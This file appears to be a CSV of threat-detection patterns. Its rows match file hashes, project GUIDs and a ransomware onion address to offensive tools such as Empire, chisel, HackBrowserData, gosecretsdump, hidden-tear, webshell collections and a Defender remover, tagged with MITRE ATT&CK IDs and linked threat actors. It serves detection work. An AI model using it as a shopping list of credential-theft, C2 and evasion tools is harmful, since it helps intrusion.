"*d6ffeb0cc599c198e2d7e053777e06273dc45fb08ede6fc8a529eed81792f9d1*",".{0,1000}d6ffeb0cc599c198e2d7e053777e06273dc45fb08ede6fc8a529eed81792f9d1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39842"
"*d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d*",".{0,1000}d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39843"
"*d7018d7037ff228d9f8528846861639c1f7c139e7769c893ae350c20098e55e5*",".{0,1000}d7018d7037ff228d9f8528846861639c1f7c139e7769c893ae350c20098e55e5.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","39844"
"*d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198*",".{0,1000}d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39845"
"*d71724687c2914d5e68596f5951d1a94fa511dd2cb57f7fbc39f771a6ec43ae7*",".{0,1000}d71724687c2914d5e68596f5951d1a94fa511dd2cb57f7fbc39f771a6ec43ae7.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","39849"
"*d71c3ea3ec686a8c080f8310b25cfe4696773a06fe151d03eb9a69de9147abcb*",".{0,1000}d71c3ea3ec686a8c080f8310b25cfe4696773a06fe151d03eb9a69de9147abcb.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","39852"
"*d71e7b439225124e610f0a5faa4a8170961d5ed80088144a1326db7e661cf646*",".{0,1000}d71e7b439225124e610f0a5faa4a8170961d5ed80088144a1326db7e661cf646.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","39853"
"*d7235f7b09d231562a5bb697e521c635343eafc044f92f11c541ea89d04ae7c4*",".{0,1000}d7235f7b09d231562a5bb697e521c635343eafc044f92f11c541ea89d04ae7c4.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39854"
"*d7257981496461fd58ba1e00931ad71ff49a9e41f7e81d5ce04de265674b14f7*",".{0,1000}d7257981496461fd58ba1e00931ad71ff49a9e41f7e81d5ce04de265674b14f7.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","39855"
"*d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142*",".{0,1000}d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39859"
"*d739d765024b9a15d65d07e64a21dc0796db4951305ffb864e9d7f781bac6b81*",".{0,1000}d739d765024b9a15d65d07e64a21dc0796db4951305ffb864e9d7f781bac6b81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39860"
"*d73ce38475b90ce68cb44cbaa7f76b091e06a970aba887a248e8bff5e9b46b57*",".{0,1000}d73ce38475b90ce68cb44cbaa7f76b091e06a970aba887a248e8bff5e9b46b57.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","39861"
"*d73fc7fcd3b0983b7ecc9590562fb0e83611dd1e3199437b108a69cddce0ac07*",".{0,1000}d73fc7fcd3b0983b7ecc9590562fb0e83611dd1e3199437b108a69cddce0ac07.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39862"
"*D7484EBA-6357-4D81-B355-066E28D5DF72*",".{0,1000}D7484EBA\-6357\-4D81\-B355\-066E28D5DF72.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","#GUIDproject","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","39863"
"*d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1*",".{0,1000}d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39864"
"*d752324eda2190948d57852d1aee1a15e77aea5aaf09522056536c4ee0e85929*",".{0,1000}d752324eda2190948d57852d1aee1a15e77aea5aaf09522056536c4ee0e85929.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","39865"
"*d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4*",".{0,1000}d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39866"
"*d7538d432a986c9f7006dfb742ed5f1673bea600c14da5168f38abf44f405896*",".{0,1000}d7538d432a986c9f7006dfb742ed5f1673bea600c14da5168f38abf44f405896.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39867"
"*d7568417704e64ca524b45240eadd4ddabfb1f477f9eecc37f6bc5654ee7d184*",".{0,1000}d7568417704e64ca524b45240eadd4ddabfb1f477f9eecc37f6bc5654ee7d184.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","39868"
"*d756b55e894c289704c0f4b0a92bfebee404bd1047494ed81a1948f7eace2b26*",".{0,1000}d756b55e894c289704c0f4b0a92bfebee404bd1047494ed81a1948f7eace2b26.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39869"
"*d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99*",".{0,1000}d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","39870"
"*d75e6210055b8ace4fb94f7108604081c957b97ce17772efd58d7ff845589ce0*",".{0,1000}d75e6210055b8ace4fb94f7108604081c957b97ce17772efd58d7ff845589ce0.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","39871"
"*d75itpgjjfe2ys2qivqplbvmw3yyx7o5e4ppt2esit2lluhngulz4hqd.onion*",".{0,1000}d75itpgjjfe2ys2qivqplbvmw3yyx7o5e4ppt2esit2lluhngulz4hqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39872"
"*d76d13a9b90ecf3be14037f420316c75b29a9b2d5f959465ec5459db61442d47*",".{0,1000}d76d13a9b90ecf3be14037f420316c75b29a9b2d5f959465ec5459db61442d47.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39874"
"*d7792222dd6c580b5590d1cef292b118d7ebbab6570db74cb459ef9f3ee4c1f5*",".{0,1000}d7792222dd6c580b5590d1cef292b118d7ebbab6570db74cb459ef9f3ee4c1f5.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","39878"
"*d77f3332083ca55d0cc730c39970b6413430e986c6adae9ece72cceb640da27b*",".{0,1000}d77f3332083ca55d0cc730c39970b6413430e986c6adae9ece72cceb640da27b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39879"
"*d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37*",".{0,1000}d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","39880"
"*d780a0a408b42bcfbb25fbd591b2396b808aaba7b8358b5543afa3be342023d6*",".{0,1000}d780a0a408b42bcfbb25fbd591b2396b808aaba7b8358b5543afa3be342023d6.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39881"
"*D78924E1-7F2B-4315-A2D2-24124C7828F8*",".{0,1000}D78924E1\-7F2B\-4315\-A2D2\-24124C7828F8.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","#GUIDproject","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","39882"
"*d78fa8da51c45a84c22819f0ab4f2b77135c9e8b48f693dde65384ecc3b8636c*",".{0,1000}d78fa8da51c45a84c22819f0ab4f2b77135c9e8b48f693dde65384ecc3b8636c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39884"
"*d7935f00dbd30fe83bd877aa2e841b8aa0c0ded7f2867b677a6e24d3fd3daaba*",".{0,1000}d7935f00dbd30fe83bd877aa2e841b8aa0c0ded7f2867b677a6e24d3fd3daaba.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39886"
"*d79a8f7e6ddf7530d9f28267e3ab74849492aae4db6facd46a3b8dd01194738f*",".{0,1000}d79a8f7e6ddf7530d9f28267e3ab74849492aae4db6facd46a3b8dd01194738f.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","39887"
"*d79b1291fc162909146710ab8ed6eb9af77c018bf5991e670e5d7b25f3feb095*",".{0,1000}d79b1291fc162909146710ab8ed6eb9af77c018bf5991e670e5d7b25f3feb095.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39888"
"*d79d4da3258689d4510878b28b66c5bc15542107d6a25a6c2a55099a31762a22*",".{0,1000}d79d4da3258689d4510878b28b66c5bc15542107d6a25a6c2a55099a31762a22.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","39889"
"*d79d89c9bd219dce8baf10adc6a49d404d135228a8bac6d04d9c1a77d6d0b9e5*",".{0,1000}d79d89c9bd219dce8baf10adc6a49d404d135228a8bac6d04d9c1a77d6d0b9e5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39890"
"*d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08*",".{0,1000}d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","39891"
"*d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08*",".{0,1000}d7a308da069dcf3990f4cbfe57b8a1cc79c5f6b1259da795bba61592b8cf4b08.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#filehash","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","39892"
"*d7a5cca2bdf63841127a1618cb25e8e9a5892269fc687ca9a795b895bdbd4ed9*",".{0,1000}d7a5cca2bdf63841127a1618cb25e8e9a5892269fc687ca9a795b895bdbd4ed9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39893"
"*d7a74608cdc46702dca5c703ad3bbc40c8b97ce6cea40695b7499987a70a9331*",".{0,1000}d7a74608cdc46702dca5c703ad3bbc40c8b97ce6cea40695b7499987a70a9331.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39894"
"*d7add2812de595a486a90bcb598d1ea630254658610f0e19d42af814b8dfa822*",".{0,1000}d7add2812de595a486a90bcb598d1ea630254658610f0e19d42af814b8dfa822.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","39896"
"*d7af38341aa0abbe61415eed66c9df434b901425b5c2acfe01b9619530c826a2*",".{0,1000}d7af38341aa0abbe61415eed66c9df434b901425b5c2acfe01b9619530c826a2.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","39897"
"*d7b2b8c7482b08e79eca66a7f8f1c9752710c1eee7f1c5df3e998c8c8ea31d26*",".{0,1000}d7b2b8c7482b08e79eca66a7f8f1c9752710c1eee7f1c5df3e998c8c8ea31d26.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39898"
"*d7bb7585cd1659c0b55b9ec18b10aeecb33af953c547dc0912a4489996da6b31*",".{0,1000}d7bb7585cd1659c0b55b9ec18b10aeecb33af953c547dc0912a4489996da6b31.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39900"
"*d7c079211118ebcf3827008bcb577d08967faeb1786506057e8e4fd730cb6420*",".{0,1000}d7c079211118ebcf3827008bcb577d08967faeb1786506057e8e4fd730cb6420.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39901"
"*d7c63d43b5eb3fa7f99253e4644bf7525246c13238d6ba5d020e1e25e277a133*",".{0,1000}d7c63d43b5eb3fa7f99253e4644bf7525246c13238d6ba5d020e1e25e277a133.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39903"
"*d7cd7a952aab71b1a1bb8ae63ce23776e5b4cdd57a1ff1ab747e9fdf0e4a548b*",".{0,1000}d7cd7a952aab71b1a1bb8ae63ce23776e5b4cdd57a1ff1ab747e9fdf0e4a548b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39904"
"*d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d*",".{0,1000}d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39905"
"*D7D20588-8C18-4796-B2A4-386AECF14256*",".{0,1000}D7D20588\-8C18\-4796\-B2A4\-386AECF14256.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","#GUIDproject","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","39906"
"*d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67*",".{0,1000}d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39907"
"*d7d86b7b1b8535a28ce0bd897ef6e6e5ebaf6e9c153bbb6052f45cea58836f76*",".{0,1000}d7d86b7b1b8535a28ce0bd897ef6e6e5ebaf6e9c153bbb6052f45cea58836f76.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39908"
